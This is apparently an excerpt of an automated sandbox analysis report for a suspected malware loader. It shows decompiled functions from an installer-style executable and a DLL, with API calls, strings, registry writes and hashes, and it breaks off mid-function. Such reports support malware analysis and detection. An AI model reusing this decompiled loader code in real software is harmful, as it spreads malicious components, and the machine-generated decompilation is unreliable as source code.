                                                                                              • Instruction Fuzzy Hash: 28711EB5A00208AFDB04CF58C890EAA7BB5FF88398F14C159FD499B345D731EA51CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 16%
                                                                                              			E6F1D8700(void* __ecx, intOrPtr _a4, intOrPtr* _a8, signed char* _a12) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed char* _t58;
                                                                                              				void* _t61;
                                                                                              				void* _t62;
                                                                                              
                                                                                              				0x6f1d0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff, __ecx);
                                                                                              				_t62 = _t61 + 0x10;
                                                                                              				if(( *_a12 & 0x000000ff) != 0x30) {
                                                                                              					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					_t62 = _t62 + 8;
                                                                                              					 *0x6f1d0000(0x6e6);
                                                                                              				}
                                                                                              				0x6f1d0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
                                                                                              				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
                                                                                              					__eflags = 1;
                                                                                              					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x10)) + ( *(_a12 + (1 << 1)) & 0x000000ff) * 4));
                                                                                              				} else {
                                                                                              					_t58 = _a12;
                                                                                              					_t66 = _t58[1] & 0x80;
                                                                                              					if((_t58[1] & 0x80) == 0) {
                                                                                              						E6F1D2310(__eflags, _a4, _a8, 0);
                                                                                              					} else {
                                                                                              						E6F1D2310(_t66, _a4,  *_a8, 0);
                                                                                              					}
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}








                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F1D8794
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F1D87A5
                                                                                              Strings
                                                                                              • flags: 0x%02x, xrefs: 6F1D875A
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F1D8713
                                                                                              • invalid format type %x, xrefs: 6F1D8732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: d90d62f3cdc12323e9f0d302e9af9c61135108cac8abaddac9f74ba053a9e364
                                                                                              • Instruction ID: 84ebea42c3875c4e45dd22d5b56e6fe98a8c73147be488416ba88be2dc7ecb3f
                                                                                              • Opcode Fuzzy Hash: d90d62f3cdc12323e9f0d302e9af9c61135108cac8abaddac9f74ba053a9e364
                                                                                              • Instruction Fuzzy Hash: 1F2195B5608294ABD704CF58C890FAA37B5BB89391F10C599FC648B3C5D635E920CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040373D(void* __ecx, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed short _t6;
                                                                                              				intOrPtr _t11;
                                                                                              				signed int _t13;
                                                                                              				intOrPtr _t15;
                                                                                              				signed int _t16;
                                                                                              				signed short* _t18;
                                                                                              				signed int _t20;
                                                                                              				signed short* _t23;
                                                                                              				intOrPtr _t25;
                                                                                              				signed int _t26;
                                                                                              				intOrPtr* _t27;
                                                                                              
                                                                                              				_t24 = "1033";
                                                                                              				_t13 = 0xffff;
                                                                                              				_t6 = E004058A2(__ecx, "1033");
                                                                                              				while(1) {
                                                                                              					_t26 =  *0x42eba4; // 0x1
                                                                                              					if(_t26 == 0) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					_t15 =  *0x42eb70; // 0x654160
                                                                                              					_t16 =  *(_t15 + 0x64);
                                                                                              					_t20 =  ~_t16;
                                                                                              					_t18 = _t16 * _t26 +  *0x42eba0;
                                                                                              					while(1) {
                                                                                              						_t18 = _t18 + _t20;
                                                                                              						_t26 = _t26 - 1;
                                                                                              						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						if(_t26 != 0) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					 *0x42e340 = _t18[1];
                                                                                              					 *0x42ec08 = _t18[3];
                                                                                              					_t23 =  &(_t18[5]);
                                                                                              					if(_t23 != 0) {
                                                                                              						 *0x42e33c = _t23;
                                                                                              						E00405889(_t24,  *_t18 & 0x0000ffff);
                                                                                              						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "qjsvdse Setup", 0xfffffffe));
                                                                                              						_t11 =  *0x42eb8c; // 0x1
                                                                                              						_t27 =  *0x42eb88; // 0x65430c
                                                                                              						if(_t11 == 0) {
                                                                                              							L15:
                                                                                              							return _t11;
                                                                                              						}
                                                                                              						_t25 = _t11;
                                                                                              						do {
                                                                                              							_t11 =  *_t27;
                                                                                              							if(_t11 != 0) {
                                                                                              								_t5 = _t27 + 0x18; // 0x654324
                                                                                              								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
                                                                                              							}
                                                                                              							_t27 = _t27 + 0x418;
                                                                                              							_t25 = _t25 - 1;
                                                                                              						} while (_t25 != 0);
                                                                                              						goto L15;
                                                                                              					}
                                                                                              					L7:
                                                                                              					if(_t13 != 0xffff) {
                                                                                              						_t13 = 0;
                                                                                              					} else {
                                                                                              						_t13 = 0x3ff;
                                                                                              					}
                                                                                              				}
                                                                                              			}


















                                                                                              APIs
                                                                                              • SetWindowTextA.USER32(00000000,qjsvdse Setup), ref: 004037D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$`Ae$qjsvdse Setup
                                                                                              • API String ID: 530164218-2365723798
                                                                                              • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                              • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                                                                              • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                              • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E004022F5(void* __eax) {
                                                                                              				void* _t15;
                                                                                              				char* _t18;
                                                                                              				int _t19;
                                                                                              				char _t24;
                                                                                              				int _t27;
                                                                                              				signed int _t30;
                                                                                              				intOrPtr _t35;
                                                                                              				void* _t37;
                                                                                              
                                                                                              				_t15 = E00402ADD(__eax);
                                                                                              				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                                                                              				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                                                              				 *(_t37 - 0x44) = E004029E8(2);
                                                                                              				_t18 = E004029E8(0x11);
                                                                                              				_t30 =  *0x42ec10; // 0x0
                                                                                              				 *(_t37 - 4) = 1;
                                                                                              				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                                                                              				if(_t19 == 0) {
                                                                                              					if(_t35 == 1) {
                                                                                              						E004029E8(0x23);
                                                                                              						_t19 = lstrlenA(0x40a378) + 1;
                                                                                              					}
                                                                                              					if(_t35 == 4) {
                                                                                              						_t24 = E004029CB(3);
                                                                                              						 *0x40a378 = _t24;
                                                                                              						_t19 = _t35;
                                                                                              					}
                                                                                              					if(_t35 == 3) {
                                                                                              						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
                                                                                              					}
                                                                                              					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
                                                                                              						 *(_t37 - 4) = _t27;
                                                                                              					}
                                                                                              					_push( *(_t37 + 8));
                                                                                              					RegCloseKey();
                                                                                              				}
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
                                                                                              				return 0;
                                                                                              			}












                                                                                              APIs
                                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswBB9.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswBB9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswBB9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nswBB9.tmp
                                                                                              • API String ID: 1356686001-1646629439
                                                                                              • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                              • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                                                                              • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                              • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E00402A28(void* _a4, char* _a8, long _a12) {
                                                                                              				void* _v8;
                                                                                              				char _v272;
                                                                                              				signed char _t16;
                                                                                              				long _t18;
                                                                                              				long _t25;
                                                                                              				intOrPtr* _t27;
                                                                                              				long _t28;
                                                                                              
                                                                                              				_t16 =  *0x42ec10; // 0x0
                                                                                              				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                                                                              				if(_t18 == 0) {
                                                                                              					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                              						__eflags = _a12;
                                                                                              						if(_a12 != 0) {
                                                                                              							RegCloseKey(_v8);
                                                                                              							L8:
                                                                                              							__eflags = 1;
                                                                                              							return 1;
                                                                                              						}
                                                                                              						_t25 = E00402A28(_v8,  &_v272, 0);
                                                                                              						__eflags = _t25;
                                                                                              						if(_t25 != 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              					}
                                                                                              					RegCloseKey(_v8);
                                                                                              					_t27 = E00405C49(2);
                                                                                              					if(_t27 == 0) {
                                                                                              						__eflags =  *0x42ec10; // 0x0
                                                                                              						if(__eflags != 0) {
                                                                                              							goto L8;
                                                                                              						}
                                                                                              						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                              						__eflags = _t28;
                                                                                              						if(_t28 != 0) {
                                                                                              							goto L8;
                                                                                              						}
                                                                                              						return _t28;
                                                                                              					}
                                                                                              					return  *_t27(_a4, _a8,  *0x42ec10, 0);
                                                                                              				}
                                                                                              				return _t18;
                                                                                              			}











                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                              • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                                                                              • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                              • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00401CC1(int __edx) {
                                                                                              				void* _t17;
                                                                                              				struct HINSTANCE__* _t21;
                                                                                              				struct HWND__* _t25;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                                                              				GetClientRect(_t25, _t27 - 0x40);
                                                                                              				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                                              				if(_t17 != _t21) {
                                                                                              					DeleteObject(_t17);
                                                                                              				}
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
                                                                                              				return 0;
                                                                                              			}








                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                              • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                                                                              • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                              • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 49%
                                                                                              			E6F1DD830(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
                                                                                              				signed int _v5;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _v40;
                                                                                              				signed int _v44;
                                                                                              
                                                                                              				_v28 = _a4 & 0x000000ff;
                                                                                              				_v28 = _v28 - 0x1b;
                                                                                              				if(_v28 > 0xa) {
                                                                                              					L57:
                                                                                              					0x6f1d0000("unknown array format 0x%x\n", _a4 & 0x000000ff);
                                                                                              					return  *0x6f1d0000(0x6f7);
                                                                                              				}
                                                                                              				_t7 = _v28 + 0x6f1dde1c; // 0xcccccc03
                                                                                              				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6F1DDE08))) {
                                                                                              					case 0:
                                                                                              						_v12 =  *((intOrPtr*)(_a16 + 2));
                                                                                              						_v5 = ( *(_a16 + (1 << 0)) & 0x000000ff) + 1;
                                                                                              						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						_v16 = _v24;
                                                                                              						_a16 = E6F1DA440(_a8, _a16 + 4);
                                                                                              						E6F1D73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
                                                                                              						_t298 = _t294 + 0x18;
                                                                                              						if((_a28 & 0x000000ff) == 0) {
                                                                                              							L11:
                                                                                              							return _v16;
                                                                                              						} else {
                                                                                              							if((_a20 & 0x000000ff) == 0) {
                                                                                              								__eflags = _a24 & 0x000000ff;
                                                                                              								if((_a24 & 0x000000ff) != 0) {
                                                                                              									_t250 = _a8;
                                                                                              									__eflags =  *(_t250 + 0x20) & 0x000000ff;
                                                                                              									if(( *(_t250 + 0x20) & 0x000000ff) == 0) {
                                                                                              										__eflags =  *_a12;
                                                                                              										if( *_a12 == 0) {
                                                                                              											 *_a12 =  *(_a8 + 4);
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t252 = E6F1DA3B0(_v24, _a8, _v24);
                                                                                              								_t298 = _t298 + 8;
                                                                                              								 *_a12 = _t252;
                                                                                              							}
                                                                                              							_v20 =  *(_a8 + 4);
                                                                                              							E6F1DAF00(_a8, _v16);
                                                                                              							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
                                                                                              							E6F1DC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
                                                                                              							_push( *_a12);
                                                                                              							_push(_v20);
                                                                                              							_push("copying %p to %p\n");
                                                                                              							0x6f1d0000();
                                                                                              							if( *_a12 != _v20) {
                                                                                              								E6F1E00E0( *_a12, _v20, _v16);
                                                                                              							}
                                                                                              							goto L11;
                                                                                              						}
                                                                                              					case 1:
                                                                                              						__eax = _a16;
                                                                                              						__cx =  *((intOrPtr*)(__eax + 2));
                                                                                              						_v12 =  *((intOrPtr*)(__eax + 2));
                                                                                              						1 = 1 << 0;
                                                                                              						__eax = _a16;
                                                                                              						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
                                                                                              						_v5 = __cl;
                                                                                              						_a16 = _a16 + 4;
                                                                                              						__eax = _a8;
                                                                                              						_a16 = E6F1DA440(_a8, _a16 + 4);
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _a16;
                                                                                              						__ecx = _a8;
                                                                                              						_a16 = E6F1DA540(__ecx, __ecx, _a16,  *(_a8 + 0x3c));
                                                                                              						__edx = _v5 & 0x000000ff;
                                                                                              						_a8 = _a8 + 4;
                                                                                              						__eax = E6F1D73D0(__ecx, _a8 + 4, _v5 & 0x000000ff);
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x44);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v16 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						__ecx = _a28 & 0x000000ff;
                                                                                              						__eflags = _a28 & 0x000000ff;
                                                                                              						if((_a28 & 0x000000ff) != 0) {
                                                                                              							__edx = _a8;
                                                                                              							__eax =  *(__edx + 0x40);
                                                                                              							_v40 =  *(__edx + 0x40);
                                                                                              							__ecx = _a20 & 0x000000ff;
                                                                                              							__eflags = _a20 & 0x000000ff;
                                                                                              							if((_a20 & 0x000000ff) == 0) {
                                                                                              								__edx = _a12;
                                                                                              								__eflags =  *_a12;
                                                                                              								if( *_a12 == 0) {
                                                                                              									_a20 = 1;
                                                                                              								}
                                                                                              							}
                                                                                              							__eax = _a20 & 0x000000ff;
                                                                                              							__eflags = _a20 & 0x000000ff;
                                                                                              							if((_a20 & 0x000000ff) != 0) {
                                                                                              								__ecx = _v24;
                                                                                              								__edx = _a8;
                                                                                              								__eax = E6F1DA3B0(_v24, _a8, _v24);
                                                                                              								__ecx = _a12;
                                                                                              								 *_a12 = __eax;
                                                                                              							}
                                                                                              							__edx = _a8;
                                                                                              							__eax =  *(__edx + 4);
                                                                                              							_v20 =  *(__edx + 4);
                                                                                              							__ecx = _v16;
                                                                                              							__edx = _a8;
                                                                                              							E6F1DAF00(_a8, _v16) = _a8;
                                                                                              							__ecx = _v20;
                                                                                              							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
                                                                                              							__edx = _a20 & 0x000000ff;
                                                                                              							__eax = _a16;
                                                                                              							__ecx = _a12;
                                                                                              							__edx =  *_a12;
                                                                                              							__eax = _v20;
                                                                                              							__ecx = _a8;
                                                                                              							__eax = E6F1DC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
                                                                                              							__edx = _v16;
                                                                                              							__eax = _v20;
                                                                                              							__ecx = _a12;
                                                                                              							 *_a12 =  *_a12 + _v40;
                                                                                              							__eflags =  *_a12 + _v40;
                                                                                              							__eax = E6F1E00E0( *_a12 + _v40, _v20, _v16);
                                                                                              						}
                                                                                              						__eax = _v16;
                                                                                              						return _v16;
                                                                                              					case 2:
                                                                                              						1 = 1 << 0;
                                                                                              						__eax = _a16;
                                                                                              						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
                                                                                              						_v5 = __cl;
                                                                                              						_a16 = _a16 + 4;
                                                                                              						__eax = _a8;
                                                                                              						_a16 = E6F1DA440(_a8, _a16 + 4);
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _a16;
                                                                                              						__ecx = _a8;
                                                                                              						_a16 = E6F1DA540(_a8, _a8, _a16,  *(_a8 + 0x3c));
                                                                                              						__edx = _a16;
                                                                                              						_push(_a16);
                                                                                              						__eax = _a8;
                                                                                              						_push(_a8);
                                                                                              						0x6f1d0000();
                                                                                              						__esp = __esp + 8;
                                                                                              						_v12 = __ax;
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						__ecx = _a28 & 0x000000ff;
                                                                                              						__eflags = _a28 & 0x000000ff;
                                                                                              						if(__eflags == 0) {
                                                                                              							_push(0xab4);
                                                                                              							__eax = E6F1DFA34(__ebx, __edx, __edi, __esi, __eflags, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
                                                                                              						}
                                                                                              						__eax = _a20 & 0x000000ff;
                                                                                              						__eflags = _a20 & 0x000000ff;
                                                                                              						if((_a20 & 0x000000ff) == 0) {
                                                                                              							__ecx = _a12;
                                                                                              							__eflags =  *_a12;
                                                                                              							if( *_a12 == 0) {
                                                                                              								_a20 = 1;
                                                                                              							}
                                                                                              						}
                                                                                              						__edx = _a20 & 0x000000ff;
                                                                                              						__eflags = _a20 & 0x000000ff;
                                                                                              						if((_a20 & 0x000000ff) != 0) {
                                                                                              							__eax = _v24;
                                                                                              							__ecx = _a8;
                                                                                              							__eax = E6F1DA3B0(_a8, _a8, _v24);
                                                                                              							__edx = _a12;
                                                                                              							 *_a12 = __eax;
                                                                                              						}
                                                                                              						__eax = _v5 & 0x000000ff;
                                                                                              						__ecx = _a8;
                                                                                              						__ecx = _a8 + 4;
                                                                                              						__eax = E6F1D73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
                                                                                              						__edx = _a8;
                                                                                              						__eax =  *(__edx + 4);
                                                                                              						_v20 =  *(__edx + 4);
                                                                                              						__ecx = _a12;
                                                                                              						__edx =  *_a12;
                                                                                              						_v36 =  *_a12;
                                                                                              						__eax = _a8;
                                                                                              						__ecx =  *(__eax + 0x44);
                                                                                              						_v44 =  *(__eax + 0x44);
                                                                                              						_v32 = 0;
                                                                                              						while(1) {
                                                                                              							__eax = _v32;
                                                                                              							__eflags = _v32 - _v44;
                                                                                              							if(_v32 >= _v44) {
                                                                                              								break;
                                                                                              							}
                                                                                              							__ecx = _a20 & 0x000000ff;
                                                                                              							__edx = _a16;
                                                                                              							__eax = _v36;
                                                                                              							__ecx = _a8;
                                                                                              							_v36 = E6F1D9560(_a8, _v36, _a16, 0, _a20 & 0x000000ff);
                                                                                              							__edx = _v32;
                                                                                              							__edx = _v32 + 1;
                                                                                              							__eflags = __edx;
                                                                                              							_v32 = __edx;
                                                                                              						}
                                                                                              						__edx = _a8;
                                                                                              						 *(__edx + 4) =  *(__edx + 4) - _v20;
                                                                                              						return  *(__edx + 4) - _v20;
                                                                                              					case 3:
                                                                                              						__eax = _a4 & 0x000000ff;
                                                                                              						__eflags = (_a4 & 0x000000ff) - 0x22;
                                                                                              						if((_a4 & 0x000000ff) != 0x22) {
                                                                                              							__edx = 2;
                                                                                              							_v12 = __dx;
                                                                                              						} else {
                                                                                              							__ecx = 1;
                                                                                              							_v12 = __cx;
                                                                                              						}
                                                                                              						__eax = _a8;
                                                                                              						__ecx =  *(_a8 + 0x3c);
                                                                                              						__edx = _a8;
                                                                                              						E6F1DA540( *(_a8 + 0x3c), _a8, 0,  *(_a8 + 0x3c)) = 1;
                                                                                              						__eax = 1 << 0;
                                                                                              						__ecx = _a16;
                                                                                              						__edx =  *(__ecx + (1 << 0)) & 0x000000ff;
                                                                                              						__eflags = ( *(__ecx + (1 << 0)) & 0x000000ff) - 0x44;
                                                                                              						if(( *(__ecx + (1 << 0)) & 0x000000ff) != 0x44) {
                                                                                              							__eax = _a8;
                                                                                              							__ecx = _a8;
                                                                                              							__edx =  *(__eax + 0x3c);
                                                                                              							__eflags =  *(__eax + 0x3c) -  *((intOrPtr*)(__ecx + 0x44));
                                                                                              							if( *(__eax + 0x3c) !=  *((intOrPtr*)(__ecx + 0x44))) {
                                                                                              								__eax = _a8;
                                                                                              								__ecx =  *(__eax + 0x3c);
                                                                                              								_push( *(__eax + 0x3c));
                                                                                              								__edx = _a8;
                                                                                              								__eax =  *(__edx + 0x44);
                                                                                              								_push( *(__edx + 0x44));
                                                                                              								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								_push(0x6c6);
                                                                                              								__eax =  *0x6f1d0000();
                                                                                              							}
                                                                                              						}
                                                                                              						__ecx = _a8;
                                                                                              						__eflags =  *(__ecx + 0x40);
                                                                                              						if( *(__ecx + 0x40) != 0) {
                                                                                              							__edx = _a8;
                                                                                              							__eax =  *(__edx + 0x40);
                                                                                              							_push( *(__edx + 0x40));
                                                                                              							_push("conformant strings can\'t have Offset (%d)\n");
                                                                                              							0x6f1d0000();
                                                                                              							__esp = __esp + 8;
                                                                                              							_push(0x6c6);
                                                                                              							__eax =  *0x6f1d0000();
                                                                                              						}
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _v12 & 0x0000ffff;
